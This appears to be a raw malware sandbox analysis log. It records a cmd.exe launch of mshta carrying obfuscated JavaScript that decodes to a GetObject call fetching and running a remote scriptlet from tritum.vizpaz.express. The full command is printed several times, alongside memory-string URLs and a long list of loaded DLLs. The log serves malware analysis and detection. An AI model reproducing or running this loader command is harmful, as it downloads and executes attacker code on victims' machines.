Click to jump to signature section
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: mshta.exe, 00000002.00000003.2161051958.000002AA1356D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: HttPs://tritum.vizpaz.express/?1/ |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/ |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://donate.wikimedia.org/?wmf_medium=portal&wmf_campaign=portalFooter&wmf_source=portalFooter |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use |
Source: mshta.exe, 00000002.00000003.2164201881.000002A210B49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164815019.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164299160.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153593726.000002A210BD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164846336.000002A210B4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153795741.000002A210B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8 |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu |
Source: mshta.exe, 00000002.00000003.2139843570.000002AA1366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/ |
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/( |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/C |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/F |
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165519421.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/I |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/?1/k |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/W |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tritum.vizpaz.express/Y |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2. |
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | String found in binary or memory: https://wikis.world/ |
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll | Jump to behavior |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165374329.000002AA13654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: unknown | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v:on /v:off /d/c mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()" | Jump to behavior |